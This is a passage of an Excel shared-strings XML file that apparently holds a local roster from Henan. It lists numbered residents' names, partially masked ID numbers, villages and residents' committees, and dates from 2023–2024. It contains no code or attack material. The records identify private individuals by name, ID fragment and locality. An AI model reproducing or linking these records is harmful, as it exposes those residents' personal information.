    <t>岳全玲</t>
  </si>
  <si>
    <t>1495</t>
  </si>
  <si>
    <t>王成伟</t>
  </si>
  <si>
    <t>412921********1574</t>
  </si>
  <si>
    <t>1496</t>
  </si>
  <si>
    <t>李辉</t>
  </si>
  <si>
    <t>1497</t>
  </si>
  <si>
    <t>程金华</t>
  </si>
  <si>
    <t>1498</t>
  </si>
  <si>
    <t>张山</t>
  </si>
  <si>
    <t>1499</t>
  </si>
  <si>
    <t>胡桂欣</t>
  </si>
  <si>
    <t>1500</t>
  </si>
  <si>
    <t>汤恒星</t>
  </si>
  <si>
    <t>1501</t>
  </si>
  <si>
    <t>汤博渊</t>
  </si>
  <si>
    <t>411321********0035</t>
  </si>
  <si>
    <t>1502</t>
  </si>
  <si>
    <t>赵超杰</t>
  </si>
  <si>
    <t>411326********6140</t>
  </si>
  <si>
    <t>1503</t>
  </si>
  <si>
    <t>李来波</t>
  </si>
  <si>
    <t>1504</t>
  </si>
  <si>
    <t>王振兰</t>
  </si>
  <si>
    <t>1505</t>
  </si>
  <si>
    <t>赵登峰</t>
  </si>
  <si>
    <t>1506</t>
  </si>
  <si>
    <t>余石琨</t>
  </si>
  <si>
    <t>411321********151X</t>
  </si>
  <si>
    <t>1507</t>
  </si>
  <si>
    <t>余雪萌</t>
  </si>
  <si>
    <t>411321********0220</t>
  </si>
  <si>
    <t>1508</t>
  </si>
  <si>
    <t>郑作民</t>
  </si>
  <si>
    <t>1509</t>
  </si>
  <si>
    <t>田萍</t>
  </si>
  <si>
    <t>1510</t>
  </si>
  <si>
    <t>范春岳</t>
  </si>
  <si>
    <t>1511</t>
  </si>
  <si>
    <t>陈斌</t>
  </si>
  <si>
    <t>411326********1558</t>
  </si>
  <si>
    <t>1512</t>
  </si>
  <si>
    <t>侯新俊</t>
  </si>
  <si>
    <t>1513</t>
  </si>
  <si>
    <t>张献月</t>
  </si>
  <si>
    <t>411321********0308</t>
  </si>
  <si>
    <t>1514</t>
  </si>
  <si>
    <t>张献文</t>
  </si>
  <si>
    <t>411321********0373</t>
  </si>
  <si>
    <t>1515</t>
  </si>
  <si>
    <t>云阳老城一组</t>
  </si>
  <si>
    <t>武自松</t>
  </si>
  <si>
    <t>1516</t>
  </si>
  <si>
    <t>赵国华</t>
  </si>
  <si>
    <t>1517</t>
  </si>
  <si>
    <t>武钊</t>
  </si>
  <si>
    <t>411326********1533</t>
  </si>
  <si>
    <t>1518</t>
  </si>
  <si>
    <t>云阳老城四组</t>
  </si>
  <si>
    <t>张小红</t>
  </si>
  <si>
    <t>1519</t>
  </si>
  <si>
    <t>云阳老城</t>
  </si>
  <si>
    <t>郑双振</t>
  </si>
  <si>
    <t>412921********1557</t>
  </si>
  <si>
    <t>1520</t>
  </si>
  <si>
    <t>张付海</t>
  </si>
  <si>
    <t>1521</t>
  </si>
  <si>
    <t>赵建</t>
  </si>
  <si>
    <t>1522</t>
  </si>
  <si>
    <t>赵起超</t>
  </si>
  <si>
    <t>411321********1512</t>
  </si>
  <si>
    <t>1523</t>
  </si>
  <si>
    <t>赵健超</t>
  </si>
  <si>
    <t>411321********0233</t>
  </si>
  <si>
    <t>1524</t>
  </si>
  <si>
    <t>杨永卫</t>
  </si>
  <si>
    <t>412921********1612</t>
  </si>
  <si>
    <t>1525</t>
  </si>
  <si>
    <t>杜书霞</t>
  </si>
  <si>
    <t>1526</t>
  </si>
  <si>
    <t>李佳琦</t>
  </si>
  <si>
    <t>1527</t>
  </si>
  <si>
    <t>郭延峰</t>
  </si>
  <si>
    <t>412921********0071</t>
  </si>
  <si>
    <t>1528</t>
  </si>
  <si>
    <t>吴念玲</t>
  </si>
  <si>
    <t>1529</t>
  </si>
  <si>
    <t>张应亮</t>
  </si>
  <si>
    <t>412921********1550</t>
  </si>
  <si>
    <t>1530</t>
  </si>
  <si>
    <t>孙炳辉</t>
  </si>
  <si>
    <t>412921********1615</t>
  </si>
  <si>
    <t>1531</t>
  </si>
  <si>
    <t>毛玉霞</t>
  </si>
  <si>
    <t>1532</t>
  </si>
  <si>
    <t>马志久</t>
  </si>
  <si>
    <t>411321********5136</t>
  </si>
  <si>
    <t>1533</t>
  </si>
  <si>
    <t>牧宏霖</t>
  </si>
  <si>
    <t>411321********1510</t>
  </si>
  <si>
    <t>1534</t>
  </si>
  <si>
    <t>铁丰仙</t>
  </si>
  <si>
    <t>1535</t>
  </si>
  <si>
    <t>云阳公安分局</t>
  </si>
  <si>
    <t>任玉淑</t>
  </si>
  <si>
    <t>1536</t>
  </si>
  <si>
    <t>白玉宾</t>
  </si>
  <si>
    <t>1537</t>
  </si>
  <si>
    <t>卢建</t>
  </si>
  <si>
    <t>1538</t>
  </si>
  <si>
    <t>仝瑞雪</t>
  </si>
  <si>
    <t>411326********1527</t>
  </si>
  <si>
    <t>1539</t>
  </si>
  <si>
    <t>黄荣歧</t>
  </si>
  <si>
    <t>1540</t>
  </si>
  <si>
    <t>大关居委会</t>
  </si>
  <si>
    <t>杨智杰</t>
  </si>
  <si>
    <t>411321********2477</t>
  </si>
  <si>
    <t>1541</t>
  </si>
  <si>
    <t>李滨红</t>
  </si>
  <si>
    <t>四集中</t>
  </si>
  <si>
    <t>1542</t>
  </si>
  <si>
    <t>张洪旬</t>
  </si>
  <si>
    <t>1543</t>
  </si>
  <si>
    <t>南召店村南头组</t>
  </si>
  <si>
    <t>魏俊超</t>
  </si>
  <si>
    <t>411326********6118</t>
  </si>
  <si>
    <t>1544</t>
  </si>
  <si>
    <t>陈建荣</t>
  </si>
  <si>
    <t>1545</t>
  </si>
  <si>
    <t>南召店居委会</t>
  </si>
  <si>
    <t>孙明勤</t>
  </si>
  <si>
    <t>1546</t>
  </si>
  <si>
    <t>西关居委会</t>
  </si>
  <si>
    <t>王虎</t>
  </si>
  <si>
    <t>412921********1596</t>
  </si>
  <si>
    <t>4113210524</t>
  </si>
  <si>
    <t>2023年7月</t>
  </si>
  <si>
    <t>1547</t>
  </si>
  <si>
    <t>王峰</t>
  </si>
  <si>
    <t>1548</t>
  </si>
  <si>
    <t>李小俊</t>
  </si>
  <si>
    <t>1549</t>
  </si>
  <si>
    <t>孟赓</t>
  </si>
  <si>
    <t>411321********6140</t>
  </si>
  <si>
    <t>1550</t>
  </si>
  <si>
    <t>狮子坟五里铺</t>
  </si>
  <si>
    <t>崔万青</t>
  </si>
  <si>
    <t>4113210508</t>
  </si>
  <si>
    <t>1551</t>
  </si>
  <si>
    <t>狮子坟三里店</t>
  </si>
  <si>
    <t>411326********1522</t>
  </si>
  <si>
    <t>1552</t>
  </si>
  <si>
    <t>李明鲜</t>
  </si>
  <si>
    <t>411326********1518</t>
  </si>
  <si>
    <t>1553</t>
  </si>
  <si>
    <t>狮子坟四里岔组</t>
  </si>
  <si>
    <t>曹东海</t>
  </si>
  <si>
    <t>412921********3639</t>
  </si>
  <si>
    <t>1554</t>
  </si>
  <si>
    <t>杨岗村</t>
  </si>
  <si>
    <t>冯宇</t>
  </si>
  <si>
    <t>411326********6122</t>
  </si>
  <si>
    <t>4113210516</t>
  </si>
  <si>
    <t>1555</t>
  </si>
  <si>
    <t>冯正杨</t>
  </si>
  <si>
    <t>411321********3710</t>
  </si>
  <si>
    <t>1556</t>
  </si>
  <si>
    <t>大园村</t>
  </si>
  <si>
    <t>姚敬一</t>
  </si>
  <si>
    <t>411321********0223</t>
  </si>
  <si>
    <t>4113210511</t>
  </si>
  <si>
    <t>1557</t>
  </si>
  <si>
    <t>王建斌</t>
  </si>
  <si>
    <t>411326********1520</t>
  </si>
  <si>
    <t>1558</t>
  </si>
  <si>
    <t>南召店</t>
  </si>
  <si>
    <t>杨怀玲</t>
  </si>
  <si>
    <t>1559</t>
  </si>
  <si>
    <t>王新明</t>
  </si>
  <si>
    <t>1560</t>
  </si>
  <si>
    <t>贾桂芝</t>
  </si>
  <si>
    <t>1561</t>
  </si>
  <si>
    <t>赵保国</t>
  </si>
  <si>
    <t>412922********0016</t>
  </si>
  <si>
    <t>1562</t>
  </si>
  <si>
    <t>黄依依</t>
  </si>
  <si>
    <t>411321********5308</t>
  </si>
  <si>
    <t>1563</t>
  </si>
  <si>
    <t>吕东红</t>
  </si>
  <si>
    <t>412921********1604</t>
  </si>
  <si>
    <t>1564</t>
  </si>
  <si>
    <t>张春改</t>
  </si>
  <si>
    <t>1565</t>
  </si>
  <si>
    <t>朱燕</t>
  </si>
  <si>
    <t>1566</t>
  </si>
  <si>
    <t>周堂恒</t>
  </si>
  <si>
    <t>411321********1515</t>
  </si>
  <si>
    <t>1567</t>
  </si>
  <si>
    <t>李健</t>
  </si>
  <si>
    <t>411321********2430</t>
  </si>
  <si>
    <t>1568</t>
  </si>
  <si>
    <t>靳瑞美</t>
  </si>
  <si>
    <t>411321********5607</t>
  </si>
  <si>
    <t>1569</t>
  </si>
  <si>
    <t>陈明献</t>
  </si>
  <si>
    <t>1570</t>
  </si>
  <si>
    <t>杨硕</t>
  </si>
  <si>
    <t>411326********6116</t>
  </si>
  <si>
    <t>1571</t>
  </si>
  <si>
    <t>魏生财</t>
  </si>
  <si>
    <t>1572</t>
  </si>
  <si>
    <t>李茹</t>
  </si>
  <si>
    <t>1573</t>
  </si>
  <si>
    <t>吕吉庆</t>
  </si>
  <si>
    <t>411321********6139</t>
  </si>
  <si>
    <t>1574</t>
  </si>
  <si>
    <t>1575</t>
  </si>
  <si>
    <t>王奇</t>
  </si>
  <si>
    <t>1576</t>
  </si>
  <si>
    <t>小关社区</t>
  </si>
  <si>
    <t>蔺茂林</t>
  </si>
  <si>
    <t>1577</t>
  </si>
  <si>
    <t>刘玉红</t>
  </si>
  <si>
    <t>1578</t>
  </si>
  <si>
    <t>张喜东</t>
  </si>
  <si>
    <t>412921********3313</t>
  </si>
  <si>
    <t>1579</t>
  </si>
  <si>
    <t>梁桂荣</t>
  </si>
  <si>
    <t>1580</t>
  </si>
  <si>
    <t>赵延风</t>
  </si>
  <si>
    <t>1581</t>
  </si>
  <si>
    <t>郭峰</t>
  </si>
  <si>
    <t>1582</t>
  </si>
  <si>
    <t>周香兰</t>
  </si>
  <si>
    <t>1583</t>
  </si>
  <si>
    <t>秦钰</t>
  </si>
  <si>
    <t>1584</t>
  </si>
  <si>
    <t>杨兴烨</t>
  </si>
  <si>
    <t>411321********1523</t>
  </si>
  <si>
    <t>1585</t>
  </si>
  <si>
    <t>孙笑丽</t>
  </si>
  <si>
    <t>1586</t>
  </si>
  <si>
    <t>常东峰</t>
  </si>
  <si>
    <t>1587</t>
  </si>
  <si>
    <t>常棪凯</t>
  </si>
  <si>
    <t>411321********6110</t>
  </si>
  <si>
    <t>1588</t>
  </si>
  <si>
    <t>刘晓鹏</t>
  </si>
  <si>
    <t>1589</t>
  </si>
  <si>
    <t>刘炎炎</t>
  </si>
  <si>
    <t>411322********2020</t>
  </si>
  <si>
    <t>1590</t>
  </si>
  <si>
    <t>刘子豪</t>
  </si>
  <si>
    <t>1591</t>
  </si>
  <si>
    <t>郑有方</t>
  </si>
  <si>
    <t>412921********1560</t>
  </si>
  <si>
    <t>1592</t>
  </si>
  <si>
    <t>梁裕杭</t>
  </si>
  <si>
    <t>411321********1520</t>
  </si>
  <si>
    <t>1593</t>
  </si>
  <si>
    <t>王志录</t>
  </si>
  <si>
    <t>412921********1614</t>
  </si>
  <si>
    <t>1594</t>
  </si>
  <si>
    <t>陈尚</t>
  </si>
  <si>
    <t>1595</t>
  </si>
  <si>
    <t>王延青</t>
  </si>
  <si>
    <t>412921********1639</t>
  </si>
  <si>
    <t>1596</t>
  </si>
  <si>
    <t>刘春晓</t>
  </si>
  <si>
    <t>1597</t>
  </si>
  <si>
    <t>杨书平</t>
  </si>
  <si>
    <t>1598</t>
  </si>
  <si>
    <t>杨书山</t>
  </si>
  <si>
    <t>1599</t>
  </si>
  <si>
    <t>颜伟</t>
  </si>
  <si>
    <t>1600</t>
  </si>
  <si>
    <t>老城社区</t>
  </si>
  <si>
    <t>张国芳</t>
  </si>
  <si>
    <t>1601</t>
  </si>
  <si>
    <t>郭喜梅</t>
  </si>
  <si>
    <t>412921********188X</t>
  </si>
  <si>
    <t>1602</t>
  </si>
  <si>
    <t>任行亭</t>
  </si>
  <si>
    <t>1603</t>
  </si>
  <si>
    <t>郑广兰</t>
  </si>
  <si>
    <t>1604</t>
  </si>
  <si>
    <t>任新果</t>
  </si>
  <si>
    <t>411321********1525</t>
  </si>
  <si>
    <t>1605</t>
  </si>
  <si>
    <t>凌铭楷</t>
  </si>
  <si>
    <t>411321********2038</t>
  </si>
  <si>
    <t>1606</t>
  </si>
  <si>
    <t>赵清</t>
  </si>
  <si>
    <t>411326********6167</t>
  </si>
  <si>
    <t>1607</t>
  </si>
  <si>
    <t>夏林泉</t>
  </si>
  <si>
    <t>411326********1513</t>
  </si>
  <si>
    <t>1608</t>
  </si>
  <si>
    <t>郭庆选</t>
  </si>
  <si>
    <t>412921********1530</t>
  </si>
  <si>
    <t>1609</t>
  </si>
  <si>
    <t>张勤</t>
  </si>
  <si>
    <t>1610</t>
  </si>
  <si>
    <t>李洋</t>
  </si>
  <si>
    <t>1611</t>
  </si>
  <si>
    <t>刘家民</t>
  </si>
  <si>
    <t>412921********3610</t>
  </si>
  <si>
    <t>1612</t>
  </si>
  <si>
    <t>郭钧豪</t>
  </si>
  <si>
    <t>411321********0470</t>
  </si>
  <si>
    <t>1613</t>
  </si>
  <si>
    <t>郭淯嘉</t>
  </si>
  <si>
    <t>411321********5985</t>
  </si>
  <si>
    <t>1614</t>
  </si>
  <si>
    <t>刘自丽</t>
  </si>
  <si>
    <t>1615</t>
  </si>
  <si>
    <t>云钢社区</t>
  </si>
  <si>
    <t>钱学多</t>
  </si>
  <si>
    <t>412922********572X</t>
  </si>
  <si>
    <t>1616</t>
  </si>
  <si>
    <t>季果果</t>
  </si>
  <si>
    <t>411326********6124</t>
  </si>
  <si>
    <t>1617</t>
  </si>
  <si>
    <t>张语熙</t>
  </si>
  <si>
    <t>411321********0146</t>
  </si>
  <si>
    <t>1618</t>
  </si>
  <si>
    <t>412930********2240</t>
  </si>
  <si>
    <t>1619</t>
  </si>
  <si>
    <t>张海彬</t>
  </si>
  <si>
    <t>412921********2415</t>
  </si>
  <si>
    <t>1620</t>
  </si>
  <si>
    <t>安司奥禹</t>
  </si>
  <si>
    <t>411321********5269</t>
  </si>
  <si>
    <t>1621</t>
  </si>
  <si>
    <t>1622</t>
  </si>
  <si>
    <t>任健斌</t>
  </si>
  <si>
    <t>411321********6138</t>
  </si>
  <si>
    <t>1623</t>
  </si>
  <si>
    <t>任健敏</t>
  </si>
  <si>
    <t>411321********6129</t>
  </si>
  <si>
    <t>1624</t>
  </si>
  <si>
    <t>张海翔</t>
  </si>
  <si>
    <t>411326********151X</t>
  </si>
  <si>
    <t>1625</t>
  </si>
  <si>
    <t>仝太策</t>
  </si>
  <si>
    <t>412921********161X</t>
  </si>
  <si>
    <t>1626</t>
  </si>
  <si>
    <t>许付荣</t>
  </si>
  <si>
    <t>1627</t>
  </si>
  <si>
    <t>李梅林</t>
  </si>
  <si>
    <t>1628</t>
  </si>
  <si>
    <t>李文兰</t>
  </si>
  <si>
    <t>1629</t>
  </si>
  <si>
    <t>时玉改</t>
  </si>
  <si>
    <t>410422********1020</t>
  </si>
  <si>
    <t>1630</t>
  </si>
  <si>
    <t>景国芳</t>
  </si>
  <si>
    <t>1631</t>
  </si>
  <si>
    <t>孙卿</t>
  </si>
  <si>
    <t>1632</t>
  </si>
  <si>
    <t>党蕾</t>
  </si>
  <si>
    <t>1633</t>
  </si>
  <si>
    <t>1634</t>
  </si>
  <si>
    <t>李华芝</t>
  </si>
  <si>
    <t>412921********1542</t>
  </si>
  <si>
    <t>1635</t>
  </si>
  <si>
    <t>崔蕊</t>
  </si>
  <si>
    <t>1636</t>
  </si>
  <si>
    <t>高梓洋</t>
  </si>
  <si>
    <t>411321********003X</t>
  </si>
  <si>
    <t>1637</t>
  </si>
  <si>
    <t>冯二平</t>
  </si>
  <si>
    <t>412925********5521</t>
  </si>
  <si>
    <t>1638</t>
  </si>
  <si>
    <t>赵硕</t>
  </si>
  <si>
    <t>1639</t>
  </si>
  <si>
    <t>王天来</t>
  </si>
  <si>
    <t>1640</t>
  </si>
  <si>
    <t>赵秀禄</t>
  </si>
  <si>
    <t>1641</t>
  </si>
  <si>
    <t>张云香</t>
  </si>
  <si>
    <t>1642</t>
  </si>
  <si>
    <t>李斯涵</t>
  </si>
  <si>
    <t>411321********5183</t>
  </si>
  <si>
    <t>1643</t>
  </si>
  <si>
    <t>李萌恩</t>
  </si>
  <si>
    <t>411321********0360</t>
  </si>
  <si>
    <t>1644</t>
  </si>
  <si>
    <t>吴书铃</t>
  </si>
  <si>
    <t>1645</t>
  </si>
  <si>
    <t>郭玉洋</t>
  </si>
  <si>
    <t>411326********6173</t>
  </si>
  <si>
    <t>1646</t>
  </si>
  <si>
    <t>朱洪惠</t>
  </si>
  <si>
    <t>1647</t>
  </si>
  <si>
    <t>郭晓云</t>
  </si>
  <si>
    <t>1648</t>
  </si>
  <si>
    <t>杨正珍</t>
  </si>
  <si>
    <t>412931********7165</t>
  </si>
  <si>
    <t>1649</t>
  </si>
  <si>
    <t>张舰</t>
  </si>
  <si>
    <t>412925********3250</t>
  </si>
  <si>
    <t>1650</t>
  </si>
  <si>
    <t>张耀文</t>
  </si>
  <si>
    <t>411322********1654</t>
  </si>
  <si>
    <t>1651</t>
  </si>
  <si>
    <t>刘桂芝</t>
  </si>
  <si>
    <t>1652</t>
  </si>
  <si>
    <t>杨秀连</t>
  </si>
  <si>
    <t>412929********6541</t>
  </si>
  <si>
    <t>1653</t>
  </si>
  <si>
    <t>邱秀平</t>
  </si>
  <si>
    <t>412921********1583</t>
  </si>
  <si>
    <t>1654</t>
  </si>
  <si>
    <t>李先菊</t>
  </si>
  <si>
    <t>1655</t>
  </si>
  <si>
    <t>马兴贵</t>
  </si>
  <si>
    <t>412921********0741</t>
  </si>
  <si>
    <t>1656</t>
  </si>
  <si>
    <t>陈学珍</t>
  </si>
  <si>
    <t>1657</t>
  </si>
  <si>
    <t>方桂荣</t>
  </si>
  <si>
    <t>412921********166X</t>
  </si>
  <si>
    <t>1658</t>
  </si>
  <si>
    <t>郭风枝</t>
  </si>
  <si>
    <t>412931********6764</t>
  </si>
  <si>
    <t>1659</t>
  </si>
  <si>
    <t>翟景山</t>
  </si>
  <si>
    <t>1660</t>
  </si>
  <si>
    <t>张云</t>
  </si>
  <si>
    <t>412921********2827</t>
  </si>
  <si>
    <t>1661</t>
  </si>
  <si>
    <t>靳德荣</t>
  </si>
  <si>
    <t>412921********1680</t>
  </si>
  <si>
    <t>1662</t>
  </si>
  <si>
    <t>李书芳</t>
  </si>
  <si>
    <t>1663</t>
  </si>
  <si>
    <t>梁亚东</t>
  </si>
  <si>
    <t>412921********1812</t>
  </si>
  <si>
    <t>1664</t>
  </si>
  <si>
    <t>刘冬</t>
  </si>
  <si>
    <t>1665</t>
  </si>
  <si>
    <t>张明琴</t>
  </si>
  <si>
    <t>1666</t>
  </si>
  <si>
    <t>刘介兰</t>
  </si>
  <si>
    <t>412930********1727</t>
  </si>
  <si>
    <t>1667</t>
  </si>
  <si>
    <t>高举荣</t>
  </si>
  <si>
    <t>412925********5586</t>
  </si>
  <si>
    <t>1668</t>
  </si>
  <si>
    <t>马银栋</t>
  </si>
  <si>
    <t>1669</t>
  </si>
  <si>
    <t>林桂芳</t>
  </si>
  <si>
    <t>1670</t>
  </si>
  <si>
    <t>胡伟</t>
  </si>
  <si>
    <t>412921********1657</t>
  </si>
  <si>
    <t>1671</t>
  </si>
  <si>
    <t>张建伟</t>
  </si>
  <si>
    <t>412921********1553</t>
  </si>
  <si>
    <t>1672</t>
  </si>
  <si>
    <t>徐莉</t>
  </si>
  <si>
    <t>1673</t>
  </si>
  <si>
    <t>胡显荣</t>
  </si>
  <si>
    <t>1674</t>
  </si>
  <si>
    <t>陈明超</t>
  </si>
  <si>
    <t>1675</t>
  </si>
  <si>
    <t>薛天芝</t>
  </si>
  <si>
    <t>1676</t>
  </si>
  <si>
    <t>郑浩</t>
  </si>
  <si>
    <t>1677</t>
  </si>
  <si>
    <t>曹会志</t>
  </si>
  <si>
    <t>1678</t>
  </si>
  <si>
    <t>臧秀连</t>
  </si>
  <si>
    <t>1679</t>
  </si>
  <si>
    <t>郭长克</t>
  </si>
  <si>
    <t>1680</t>
  </si>
  <si>
    <t>郭金沅</t>
  </si>
  <si>
    <t>1681</t>
  </si>
  <si>
    <t>屈玉焕</t>
  </si>
  <si>
    <t>412930********4825</t>
  </si>
  <si>
    <t>1682</t>
  </si>
  <si>
    <t>王一杰</t>
  </si>
  <si>
    <t>1683</t>
  </si>
  <si>
    <t>余宛蓉</t>
  </si>
  <si>
    <t>410381********0121</t>
  </si>
  <si>
    <t>1684</t>
  </si>
  <si>
    <t>袁金瑞</t>
  </si>
  <si>
    <t>1685</t>
  </si>
  <si>
    <t>张瑞</t>
  </si>
  <si>
    <t>1686</t>
  </si>
  <si>
    <t>张旋</t>
  </si>
  <si>
    <t>411321********6122</t>
  </si>
  <si>
    <t>1687</t>
  </si>
  <si>
    <t>张玲</t>
  </si>
  <si>
    <t>1688</t>
  </si>
  <si>
    <t>魏普宁</t>
  </si>
  <si>
    <t>412921********6110</t>
  </si>
  <si>
    <t>1689</t>
  </si>
  <si>
    <t>徐志勤</t>
  </si>
  <si>
    <t>412925********422X</t>
  </si>
  <si>
    <t>1690</t>
  </si>
  <si>
    <t>郑清毅</t>
  </si>
  <si>
    <t>411321********6119</t>
  </si>
  <si>
    <t>1691</t>
  </si>
  <si>
    <t>马保枝</t>
  </si>
  <si>
    <t>1692</t>
  </si>
  <si>
    <t>吴明先</t>
  </si>
  <si>
    <t>1693</t>
  </si>
  <si>
    <t>肖德兰</t>
  </si>
  <si>
    <t>412929********1925</t>
  </si>
  <si>
    <t>1694</t>
  </si>
  <si>
    <t>邱学莲</t>
  </si>
  <si>
    <t>1695</t>
  </si>
  <si>
    <t>代小丽</t>
  </si>
  <si>
    <t>1696</t>
  </si>
  <si>
    <t>李同法</t>
  </si>
  <si>
    <t>1697</t>
  </si>
  <si>
    <t>藏兴华</t>
  </si>
  <si>
    <t>1698</t>
  </si>
  <si>
    <t>郝龙海</t>
  </si>
  <si>
    <t>1699</t>
  </si>
  <si>
    <t>郝嘉亮</t>
  </si>
  <si>
    <t>411321********6137</t>
  </si>
  <si>
    <t>1700</t>
  </si>
  <si>
    <t>罗小丽</t>
  </si>
  <si>
    <t>1701</t>
  </si>
  <si>
    <t>梁士奇</t>
  </si>
  <si>
    <t>412921********1559</t>
  </si>
  <si>
    <t>1702</t>
  </si>
  <si>
    <t>严银芝</t>
  </si>
  <si>
    <t>412921********1682</t>
  </si>
  <si>
    <t>1703</t>
  </si>
  <si>
    <t>罗爱华</t>
  </si>
  <si>
    <t>620103********2313</t>
  </si>
  <si>
    <t>1704</t>
  </si>
  <si>
    <t>齐运动</t>
  </si>
  <si>
    <t>412921********1594</t>
  </si>
  <si>
    <t>1705</t>
  </si>
  <si>
    <t>赵建华</t>
  </si>
  <si>
    <t>1706</t>
  </si>
  <si>
    <t>程永</t>
  </si>
  <si>
    <t>412921********1592</t>
  </si>
  <si>
    <t>2023年9月</t>
  </si>
  <si>
    <t>1707</t>
  </si>
  <si>
    <t>程心柳</t>
  </si>
  <si>
    <t>411321********6145</t>
  </si>
  <si>
    <t>1708</t>
  </si>
  <si>
    <t>张森</t>
  </si>
  <si>
    <t>411326********1531</t>
  </si>
  <si>
    <t>1709</t>
  </si>
  <si>
    <t>张嘉铭</t>
  </si>
  <si>
    <t>411321********5317</t>
  </si>
  <si>
    <t>1710</t>
  </si>
  <si>
    <t>小关居委会五组</t>
  </si>
  <si>
    <t>孟煜杰</t>
  </si>
  <si>
    <t>1711</t>
  </si>
  <si>
    <t>孟祥贵</t>
  </si>
  <si>
    <t>1712</t>
  </si>
  <si>
    <t>孟凡有</t>
  </si>
  <si>
    <t>1713</t>
  </si>
  <si>
    <t>小关居委会一组</t>
  </si>
  <si>
    <t>马明杰</t>
  </si>
  <si>
    <t>411326********1525</t>
  </si>
  <si>
    <t>1714</t>
  </si>
  <si>
    <t>小关居委会二组</t>
  </si>
  <si>
    <t>李俊志</t>
  </si>
  <si>
    <t>411326********6132</t>
  </si>
  <si>
    <t>1715</t>
  </si>
  <si>
    <t>小关居委会三组</t>
  </si>
  <si>
    <t>董运锋</t>
  </si>
  <si>
    <t>1716</t>
  </si>
  <si>
    <t>李玉辉</t>
  </si>
  <si>
    <t>411326********1515</t>
  </si>
  <si>
    <t>1717</t>
  </si>
  <si>
    <t>吴运荣</t>
  </si>
  <si>
    <t>412921********1640</t>
  </si>
  <si>
    <t>1718</t>
  </si>
  <si>
    <t>刘中乐</t>
  </si>
  <si>
    <t>1719</t>
  </si>
  <si>
    <t>李宏恩</t>
  </si>
  <si>
    <t>411326********1530</t>
  </si>
  <si>
    <t>1720</t>
  </si>
  <si>
    <t>朱坪村下庄组</t>
  </si>
  <si>
    <t>马连发</t>
  </si>
  <si>
    <t>4113210515</t>
  </si>
  <si>
    <t>2023年11月</t>
  </si>
  <si>
    <t>1721</t>
  </si>
  <si>
    <t>王恩环</t>
  </si>
  <si>
    <t>412921********1648</t>
  </si>
  <si>
    <t>1722</t>
  </si>
  <si>
    <t>南召店村袁庄组</t>
  </si>
  <si>
    <t>王文明</t>
  </si>
  <si>
    <t>1723</t>
  </si>
  <si>
    <t>朱应霞</t>
  </si>
  <si>
    <t>1724</t>
  </si>
  <si>
    <t>段成龙</t>
  </si>
  <si>
    <t>411321********6136</t>
  </si>
  <si>
    <t>1725</t>
  </si>
  <si>
    <t>段涵馨</t>
  </si>
  <si>
    <t>411321********0381</t>
  </si>
  <si>
    <t>1726</t>
  </si>
  <si>
    <t>李清</t>
  </si>
  <si>
    <t>1727</t>
  </si>
  <si>
    <t>小关居委会</t>
  </si>
  <si>
    <t>任行迪</t>
  </si>
  <si>
    <t>1728</t>
  </si>
  <si>
    <t>王漫</t>
  </si>
  <si>
    <t>411321********558X</t>
  </si>
  <si>
    <t>1729</t>
  </si>
  <si>
    <t>董万玲</t>
  </si>
  <si>
    <t>2024年1月</t>
  </si>
  <si>
    <t>1730</t>
  </si>
  <si>
    <t>李红金</t>
  </si>
  <si>
    <t>1731</t>
  </si>
  <si>
    <t>王振豪</t>
  </si>
  <si>
    <t>411326********1516</t>
  </si>
  <si>
    <t>1732</t>
  </si>
  <si>
    <t>西关居委会一组</t>
  </si>
  <si>
    <t>杨锋</t>
  </si>
  <si>
    <t>1733</t>
  </si>
  <si>
    <t>大关居委会一组</t>
  </si>
  <si>
    <t>黄德龙</t>
  </si>
  <si>
    <t>1734</t>
  </si>
  <si>
    <t>董洪强</t>
  </si>
  <si>
    <t>2024年4月</t>
  </si>
  <si>
    <t>1735</t>
  </si>
  <si>
    <t>南召店村（医药库)</t>
  </si>
  <si>
    <t>凌润鹏</t>
  </si>
  <si>
    <t>411321********0175</t>
  </si>
  <si>
    <t>1736</t>
  </si>
  <si>
    <t>李永录</t>
  </si>
  <si>
    <t>2024年5月</t>
  </si>
  <si>
    <t>1737</t>
  </si>
  <si>
    <t>山头村余庄组</t>
  </si>
  <si>
    <t>谢书勤</t>
  </si>
  <si>
    <t>4113210512</t>
  </si>
  <si>
    <t>2024年6月</t>
  </si>
  <si>
    <t>1738</t>
  </si>
  <si>
    <t>南召店村</t>
  </si>
  <si>
    <t>张云洋</t>
  </si>
  <si>
    <t>1739</t>
  </si>
  <si>
    <t>袁顺敏</t>
  </si>
  <si>
    <t>2024年8月</t>
  </si>
  <si>
    <t>1740</t>
  </si>
  <si>
    <t>小关居委会四组</t>
  </si>
  <si>
    <t>王全成</t>
  </si>
  <si>
    <t>1741</t>
  </si>
  <si>
    <t>大关居委会五组</t>
  </si>
  <si>
    <t>林清勤</t>
  </si>
  <si>
    <t>1742</t>
  </si>
  <si>
    <t>景相新</t>
  </si>
  <si>
    <t>411326********1514</t>
  </si>
  <si>
    <t>2024年11月</t>
  </si>
  <si>
    <t>1743</t>
  </si>
  <si>
    <t>唐庄村西岭组</t>
  </si>
  <si>
    <t>陈玉勤</t>
  </si>
  <si>
    <t>412921********1688</t>
  </si>
  <si>
    <t>411321050101</t>
  </si>
  <si>
    <t>1744</t>
  </si>
  <si>
    <t>张嘉欣</t>
  </si>
  <si>
    <t>411326********6163</t>
  </si>
  <si>
    <t>1745</t>
  </si>
  <si>
    <t>王春龙</t>
  </si>
  <si>
    <t>1746</t>
  </si>
  <si>
    <t>南召店村（大理石厂）</t>
  </si>
  <si>
    <t>张国军</t>
  </si>
  <si>
    <t>1747</t>
  </si>
  <si>
    <t>闫光耀</t>
  </si>
  <si>
    <t>1748</t>
  </si>
  <si>
    <t>闫文连</t>
  </si>
  <si>
    <t>412930********1789</t>
  </si>
  <si>
    <t>1749</t>
  </si>
  <si>
    <t>李秀芝</t>
  </si>
  <si>
    <t>1750</t>
  </si>
  <si>
    <t>张玉英</t>
  </si>
  <si>
    <t>412929********2942</t>
  </si>
  <si>
    <t>1751</t>
  </si>
  <si>
    <t>皇后乡</t>
  </si>
  <si>
    <t>李德运</t>
  </si>
  <si>
    <t>412921********201X</t>
  </si>
  <si>
    <t>4113210615</t>
  </si>
  <si>
    <t>1752</t>
  </si>
  <si>
    <t>杨丰兰</t>
  </si>
  <si>
    <t>412921********2020</t>
  </si>
  <si>
    <t>1753</t>
  </si>
  <si>
    <t>段庆印</t>
  </si>
  <si>
    <t>412921********2031</t>
  </si>
  <si>
    <t>1754</t>
  </si>
  <si>
    <t>乔国玺</t>
  </si>
  <si>
    <t>1755</t>
  </si>
